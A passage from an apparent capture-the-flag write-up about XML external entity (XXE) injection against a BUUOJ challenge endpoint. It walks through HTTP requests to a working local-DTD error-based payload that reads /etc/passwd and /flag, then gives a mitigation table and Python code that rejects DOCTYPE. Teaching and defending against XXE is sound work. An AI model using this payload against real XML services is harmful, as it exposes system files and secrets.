User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Content-type: application/xml
Accept: */*
Origin: http://a6c2a9b9-e841-417e-bb40-72a51a707963.node5.buuoj.cn:81
Referer: http://a6c2a9b9-e841-417e-bb40-72a51a707963.node5.buuoj.cn:81/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive

{"message":"135601360123502401401250"}

We then get the error "Start tag expected, '<' not found, line 1, column 1", which suggests the remote service very likely parses XML.

POST /api/search HTTP/1.1
Host: a6c2a9b9-e841-417e-bb40-72a51a707963.node5.buuoj.cn:81
Content-Length: 86
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Content-type: application/xml
Accept: */*
Origin: http://a6c2a9b9-e841-417e-bb40-72a51a707963.node5.buuoj.cn:81
Referer: http://a6c2a9b9-e841-417e-bb40-72a51a707963.node5.buuoj.cn:81/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive

<?xml version="1.0" encoding="UTF-8" ?>
<message>"135601360123502401401250"</message>

Now we receive the error "Validation failed: no DTD found !, line 2, column 9". To fix it, we add a DTD.

POST /api/search HTTP/1.1
Host: a6c2a9b9-e841-417e-bb40-72a51a707963.node5.buuoj.cn:81
Content-Length: 86
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Content-type: application/xml
Accept: */*
Origin: http://a6c2a9b9-e841-417e-bb40-72a51a707963.node5.buuoj.cn:81
Referer: http://a6c2a9b9-e841-417e-bb40-72a51a707963.node5.buuoj.cn:81/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE message[
<!ENTITY id "135601360123502401401250">
]>
<message>&id;</message>

The error is now "No declaration for element message, line 5, column 24", so we add <!ELEMENT message (#PCDATA)>. With that we get normal output, which means we have worked out the XML format the endpoint expects.

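Trying OOB XXE shows that outbound loading is restricted. The server can reach the VPS's HTTP service normally, but the request fails as soon as it references a .dtd file. This indicates that the target blocks requests for external .dtd files, so the only option left is a local DTD.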

So we try injecting:

<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamsa '
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///fakefile/%file;'>">
%eval;
%error;'>
%local_dtd;

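This payload still has a problem: we receive the error "EntityValue: '%' forbidden except for entities references, line 8, column 48". Escaping the inner % characters as character references gives a working payload: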

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE message [
  <!ELEMENT message (#PCDATA)>
  <!ENTITY id "135601360123502401401250">
  <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
  <!ENTITY % ISOamsa '
    <!ENTITY &#x0025; file SYSTEM "file:///flag">
    <!ENTITY &#x0025; eval "<!ENTITY &#x0026;#x0025; error SYSTEM &#x0027;file:///fakepath/&#x0025;file;&#x0027;>">
  &#x0025;eval;&#x0025;error;
  '>
  %local_dtd;
]>
<message>&id;</message>

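Note that the % in the declaration of error must not be expanded at the moment eval is defined, otherwise the parser reports an error. That is why the escaped & (&#x0026;) is essential: <!ENTITY % error SYSTEM 'file:///fakepath/%file;'> is only declared once %eval; is expanded.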
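
The layers of escaping are easier to follow when each round of character-reference expansion is applied separately. The sketch below imitates one round with a regular expression; it is a simplified model of what the parser does when it reads an entity value, and `expand_char_refs` is a hypothetical helper name.

```python
import re

_CHAR_REF = re.compile(r"&#x([0-9A-Fa-f]+);|&#([0-9]+);")


def expand_char_refs(text: str) -> str:
    """Expand numeric character references once, without rescanning the result."""
    def replace(match):
        if match.group(1) is not None:
            return chr(int(match.group(1), 16))
        return chr(int(match.group(2)))
    return _CHAR_REF.sub(replace, text)


# The value of eval exactly as written inside the ISOamsa literal.
AS_WRITTEN = "<!ENTITY &#x0026;#x0025; error SYSTEM &#x0027;file:///fakepath/&#x0025;file;&#x0027;>"
# Round 1: happens when ISOamsa is declared; the escaped & becomes a real &.
AFTER_ISOAMSA = expand_char_refs(AS_WRITTEN)
# Round 2: happens when eval is declared; only now does the % of "error" appear.
AFTER_EVAL = expand_char_refs(AFTER_ISOAMSA)
```

After the first round the text reads `<!ENTITY &#x0025; error SYSTEM 'file:///fakepath/%file;'>`, and after the second it reads `<!ENTITY % error SYSTEM 'file:///fakepath/%file;'>`, which is the declaration that %eval; finally introduces.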

How to prevent

Secure Configuration

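| Defense | Applies to | Summary |
| --- | --- | --- |
| Disable DTDs | XXE, XEE | Turn off processing of DOCTYPE declarations |
| Disable external entity loading | XXE | Forbid loading of `SYSTEM` entities |
| Disable parameter entity resolution | XXE | Prevent remote DTD files from being loaded |
| Limit the number of entity expansions | XEE | Bound the depth of recursive entity nesting |
| Input validation and filtering | XXE, XEE | Filter sensitive keywords such as `<!ENTITY` |
| Use a securely configured parser | XXE, XEE | Enable secure mode and turn off dangerous features |
| WAF rules | XXE, XEE | Block requests that contain malicious keywords |
| Log monitoring and alerting | XXE, XEE | Record suspicious requests and raise alerts |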
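
As one way to apply the first row, the sketch below rejects any document that carries a DOCTYPE before handing it to the regular parser. It uses only Python's standard library; the names `DoctypeForbidden` and `parse_untrusted` are assumptions for illustration, and a maintained hardening library or the parser's own secure settings may be a better fit in production.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DoctypeForbidden(ValueError):
    """Raised when untrusted XML contains a DOCTYPE declaration."""


def _reject_doctype(name, system_id, public_id, has_internal_subset):
    # Called by expat as soon as it meets <!DOCTYPE ...>; raising aborts the parse.
    raise DoctypeForbidden(f"DOCTYPE declaration {name!r} is not allowed")


def parse_untrusted(xml_text: str) -> ET.Element:
    """Parse XML only if it contains no DOCTYPE, and therefore no entity declarations."""
    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = _reject_doctype
    checker.Parse(xml_text, True)
    return ET.fromstring(xml_text)
```

A plain document such as `<user><username>a</username></user>` parses normally, while any of the payloads in this article raises DoctypeForbidden before an entity is ever resolved.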

Use JSON

Replace XML with JSON where possible (safer and more modern).

Thanks for reading!

Web Application Security: XXE

Wed Jun 25 2025 Pin

Technology Secure Misconfiguration Bypass Web Application Security
